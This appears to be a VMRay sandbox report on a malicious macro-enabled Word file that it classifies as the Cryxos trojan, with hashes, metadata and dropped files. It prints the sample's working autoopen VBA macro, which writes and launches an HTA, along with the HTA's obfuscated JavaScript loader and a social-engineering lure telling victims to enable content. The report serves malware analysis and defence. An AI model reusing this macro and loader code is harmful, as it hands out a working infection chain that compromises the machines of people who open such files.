Try VMRay Platform
Malicious
Classifications

-

Threat Names

JS:Trojan.Cryxos.7513

Dynamic Analysis Report

Created on 2021-12-01T17:58:00

charge_12.01.2021.doc

Word Document
...

Remarks

(0x0200004A): 132 dumps were skipped because they exceeded the maximum dump size of 7 MB. The largest one was 19 MB.

Filters:
File Name Category Type Verdict Actions
C:\Users\RDhJ0CNFevzX\Desktop\charge_12.01.2021.doc Sample File Word Document
malicious
...
»
MIME Type application/vnd.ms-word.document.macroEnabled.12
File Size 33.52 KB
MD5 18499830201cddade8183b8e24fdf30a Copy to Clipboard
SHA1 55c498cf7273cab567f49a00c15ca3316c001215 Copy to Clipboard
SHA256 0a42f6762ae4f3b1d95aae0f8977cde6361f1d59b5ccc400c41772db0205f7c5 Copy to Clipboard
SSDeep 768:JouYXWQ6W02VWnZdw9822zARtrLfxl1Isq:mLmxfcWwkyNLfx4 Copy to Clipboard
ImpHash -
Office Information
»
Keywords ath.ebuTuoy
Creator aqbhmx
Last Modified By Пользователь Windows
Revision 2
Create Time 2021-12-01 11:28:00+00:00
Modify Time 2021-12-01 11:28:00+00:00
Application Microsoft Office Word
App Version 16.0000
Template Normal
Document Security NONE
Page Count 1
Line Count 55
Paragraph Count 1
Word Count 116
Character Count 9905
Chars With Spaces 10020
ScaleCrop False
SharedDoc False
VBA Macros (2)
»
Macro #1: ThisDocument
» 
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Function contents()
ActiveDocument.Content.Find.Execute FindText:="@1", ReplaceWith:="", Replace:=2
End Function
Function keywords()
keywords = ActiveDocument.BuiltInDocumentProperties("keywords").Value
contents
End Function
Public Function s(youDoorNext, youLoad)
Set powGirlDow = CreateObject(youDoorNext).exec("explorer " & youLoad)
End Function
Macro #2: main
» 
Attribute VB_Name = "main"
Public Sub autoopen()
lovePowGirl = StrReverse(ThisDocument.keywords)
With ActiveDocument
.SaveAs2 FileName:=lovePowGirl, FileFormat:=2
End With
ThisDocument.s StrReverse("llehs.tpircsw"), lovePowGirl
End Sub
Document Content Snippet
» 
<@1h@1t@1m@1l@1>@1<@1b@1o@1d@1y@1>@1<@1d@1i@1v@1 @1i@1d@1=@1'@1k@1a@1r@1o@1l@1Y@1o@1u@1'@1 @1s@1t@1y@1l@1e@1=@1'@1f@1o@1n@1t@1-@1c@1o@1l@1o@1r@1:@1 @1#@10@10@10@1'@1>@1l@1a@1v@1e@1<@1/@1d@1i@1v@1>@1<@1d@1i@1v@1 @1i@1d@1=@1'@1t@1u@1b@1e@1G@1i@1r@1l@1'@1 @1s@1t@1y@1l@1e@1=@1'@1f@1o@1n@1t@1-@1c@1o@1l@1o@1r@1:@1 @1#@10@10@10@1'@1>@1=@1Y@1X@1Y@1y@1B@1C@1Z@1v@1d@1X@1W@1v@1V@1H@1I@19@1A@1i@1b@1l@1d@1H@1I@1B@1N@1G@1d@1p@1Z@1X@1Z@1Y@19@1k@1Y@1q@1V@12@1Y@10@1h@1i@1I@1t@1N@1H@1e@1t@1x@1m@1M@1u@1g@1X@1b@1s@1h@1G@1d@10@1B@1n@1I@1p@1s@1D@1Z@1v@1d@1X@1W@1v@1V@1n@1L@1v@1B@1X@1Z@1u@1h@1i@1I@1H@1V@1E@1V@1i@1w@1C@1I@1i@1g@1G@1d@10@1B@1n@1O@1v@18@1y@1d@1p@15@1m@1c@1l@15@1G@1d@1h@1x@12@1c@1y@1A@1T@1M@13@1I@1m@1L@1j@19@1W@1b@1v@1Q@1X@1Z@1n@1p@13@1L@1R@1J@1z@1N@13@1E@12@1R@13@1Y@10@1a@1O@1l@1D@1c@1B@1N@1W@1Y@1X@1R@1k@1Z@1G@1x@12@1R@1O@1J@1U@1Z@11@1F@1W@1c@1H@1V@1G@1Z@14@1k@12@1L@1i@1F@12@1V@1l@1h@1H@1V@1R@19@12@1R@15@1F@1U@1Q@16@1x@1k@1U@1v@1E@1U@ ...
Extracted Image Texts (1)
»
Image 1: image1.gif
»
This document created in previous version of Hicrosoft Office Word To view or edit this document. please click “Enable editing” button on the top bar. and then click “Enable content”
YARA Matches (1)
»
Rule Name Rule Description Classification Score Actions
VBA_Obfuscation_ObjectName VBA initializes COM object from long variable name; possible obfuscation -
2/5
...
c:\users\rdhj0cnfevzx\documents\~wrd0000.tmp Dropped File HTML
malicious
...
»
Also Known As c:\users\rdhj0cnfevzx\documents\youtube.hta (Dropped File)
MIME Type text/html
File Size 3.26 KB
MD5 55d9eab53d4063a53b6ed05f7b1e75e7 Copy to Clipboard
SHA1 e6b4c81676d3ef0d2f7d08a6cc2ad90eb54908c3 Copy to Clipboard
SHA256 c7f40608ce8a3dda25c13d117790d08ef757b07b8c2ccb645a27a71adc322fb2 Copy to Clipboard
SSDeep 96:iOVvcNLnp15eL/XaxaFD1OIWCOrWETgAgQg+jgMo0Y01MDdq:iOVqb5Sa05OIWCSWETgAgQgKgu1o8 Copy to Clipboard
ImpHash -
AV Matches (2)
»
Threat Name Verdict
JS:Trojan.Cryxos.7513
malicious
JS:Trojan.Cryxos.7513
malicious
Extracted JavaScripts (4)
»
JavaScript #1
» 
function doorKarolDoor(girlLoveKarol){return(new ActiveXObject(girlLoveKarol));}function tubePow(powTubeTube){return(loveDoorLove.getElementById(powTubeTube).innerHTML);}function karolDoorKarol(likeLikeLoad){return('cha' + likeLikeLoad);}function dowLoadDoor(loadPowPow){var doorTube = tubePow('loveKarolLoad');var loveGirlLoad = "";var tubeLove, loveLikeLove, loadLoad;var powNextKarol, tubeDowDoor, loveLoveDoor, loveYouYou;var tubeKarolYou = 0;loadPowPow = loadPowPow.replace(/[^A-Za-z0-9\+\/\=]/g, "");while(tubeKarolYou < loadPowPow.length){powNextKarol = doorTube.indexOf(loadPowPow.charAt(tubeKarolYou++));tubeDowDoor = doorTube.indexOf(loadPowPow.charAt(tubeKarolYou++));loveLoveDoor = doorTube.indexOf(loadPowPow.charAt(tubeKarolYou++));loveYouYou = doorTube.indexOf(loadPowPow.charAt(tubeKarolYou++));tubeLove = (powNextKarol << 2) | (tubeDowDoor >> 4);loveLikeLove = ((tubeDowDoor & 15) << 4) | (loveLoveDoor >> 2);loadLoad = ((loveLoveDoor & 3) << 6) | loveYouYou;loveGirlLoad = loveGirlLoad + String.fromCharCode(tubeLove);if(loveLoveDoor != 64){loveGirlLoad = loveGirlLoad + String.fromCharCode(loveLikeLove);}if(loveYouYou != 64){loveGirlLoad = loveGirlLoad + String.fromCharCode(loadLoad);}}return(loveGirlLoad);}function loadKarolLike(likeLoveDow){return likeLoveDow.split('').reverse().join('');}function loadTubeNext(likeLikeLoad){return(loadKarolLike(dowLoadDoor(loadKarolLike(likeLikeLoad))));}function loadLoadGirl(likeLikeLoad, youPowKarol){return(likeLikeLoad.split(youPowKarol));}likePowLoad = window;loveDoorLove = document;likePowLoad.moveTo(-10, -10);var girlTubeTube = tubePow('tubeGirl').split("|||");var loveNextLove = loadTubeNext(girlTubeTube[0]);var karolLoadDoor = loadTubeNext(girlTubeTube[1]);
JavaScript #2
» 
function nextLovePow(girlPow){likePowLoad[loadKarolLike(tubePow('karolYou'))](girlPow);}
JavaScript #3
» 
Call nextLovePow(loveNextLove) : Call nextLovePow(karolLoadDoor)
JavaScript #4
» 
likePowLoad['close']();
c:\users\rdhj0cnfevzx\appdata\local\microsoft\windows\inetcache\counters.dat Modified File Stream
clean
...
»
MIME Type application/octet-stream
File Size 128 Bytes
MD5 cc90851958032b8c8bbb7b24ec6271dd Copy to Clipboard
SHA1 e027ad2ea4049374a3b01af2e3626b667dc816bc Copy to Clipboard
SHA256 c2d814a34b184b7cdf10e4e7a4311ff15db99326d6dd8d328b53bf9e19ccf858 Copy to Clipboard
SSDeep 3:Fl: Copy to Clipboard
ImpHash -
image1.gif Embedded File Image
clean
...
»
Also Known As c:\users\rdhj0cnfevzx\appdata\local\microsoft\windows\inetcache\content.mso\d67a1d0d.gif (Dropped File)
Parent File C:\Users\RDhJ0CNFevzX\Desktop\charge_12.01.2021.doc
MIME Type image/gif
File Size 13.99 KB
MD5 76da3e2154587dd3d69a81fcdb0c7364 Copy to Clipboard
SHA1 0f23e27b3a456b22a11d3fbc3132397b0ddc9357 Copy to Clipboard
SHA256 f9299ab3483a8f729b2aca2111b46e9952d4491ac66124fec22c1c789ebc3139 Copy to Clipboard
SSDeep 384:3j0EEYpcVhE1ltmTV/YZO4NSCWl822TnU0:w02VWnZdw9822zv Copy to Clipboard
ImpHash -
c:\users\rdhj0cnfevzx\appdata\local\microsoft\windows\inetcache\content.word\~wrd0003.doc Dropped File Unknown
clean
...
  • Actions
»
MIME Type -
File Size 0 Bytes
MD5 d41d8cd98f00b204e9800998ecf8427e Copy to Clipboard
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709 Copy to Clipboard
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 Copy to Clipboard
SSDeep 3:: Copy to Clipboard
ImpHash -
c:\users\rdhj0cnfevzx\documents\~$outube.hta Dropped File Stream
clean
...
»
MIME Type application/octet-stream
File Size 162 Bytes
MD5 f68972666afc3004f34449817d4f64cd Copy to Clipboard
SHA1 05c7cefa2d6e6aa77963cc516186b1cf988f724e Copy to Clipboard
SHA256 431bbbca757a2a5e6cbc33ee25675b79d39a4a1f3309b7f7077773fbecadf89d Copy to Clipboard
SSDeep 3:fmrc9/XMflUfxdcJHdUYlEe58RIi9C0hX/a5TKAP+:Orc9/8NUnKFmdC0hXS5zP+ Copy to Clipboard
ImpHash -
c:\users\public\dowNext.jpg Downloaded File HTML
clean
...
»
Also Known As c:\users\rdhj0cnfevzx\appdata\local\microsoft\windows\inetcache\ie\e5rrlzgr\cab3[1].htm (Downloaded File)
Parent File analysis.pcap
MIME Type text/html
File Size 203 Bytes
MD5 b5ff4c0f214fdf079ae6d835f046b7c5 Copy to Clipboard
SHA1 fc1f09a696c92d366e4868a35a5afa79129b12be Copy to Clipboard
SHA256 aaf04ecb4c67de5a7833184f5abeec5f48a2fc17bb8167637a421596e00c7e4c Copy to Clipboard
SSDeep 6:pn0+Dy9xwGObRmEr6VnetdzRx3/ZKCezocKqD:J0+oxBeRmR9etdzRx/Fez1T Copy to Clipboard
ImpHash -
VMRay - Analyzer - www.vmray.com
Legal Note - Privacy Policy
Exit-Icon
WHOIS Domain Information
Domain Name
WHOIS Response 

       		
      

     

    

   

  

  

  

  

   

    
    

     Function Logfile
    

    

     

      Download-Icon
     

    

    

     Exit-Icon
    

   

   

    

     

      
       This feature requires an online-connection to the VMRay backend.
      
      

      

      An offline version with limited functionality is also provided.
      

      The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy".
     

     

    

   

   

    Before
   

   

    

     

      
       This feature requires an online-connection to the VMRay backend.
      
      

      

      An offline version with limited functionality is also provided.
      

      The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy".
     

     

    

   

   

    After
   

   

    

     

      
       This feature requires an online-connection to the VMRay backend.
      
      

      

      An offline version with limited functionality is also provided.
      

      The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy".
     

     

    

   

   

    

     
      

       
       
       
       
      

     
     
     
    

   

  

  

   

    
    

     Screenshot
    

    

     Expand-Icon
    

    

     Exit-Icon
    

   

   

    

     icon_left
    

    

     icon_left
    

   

   

   

   

    image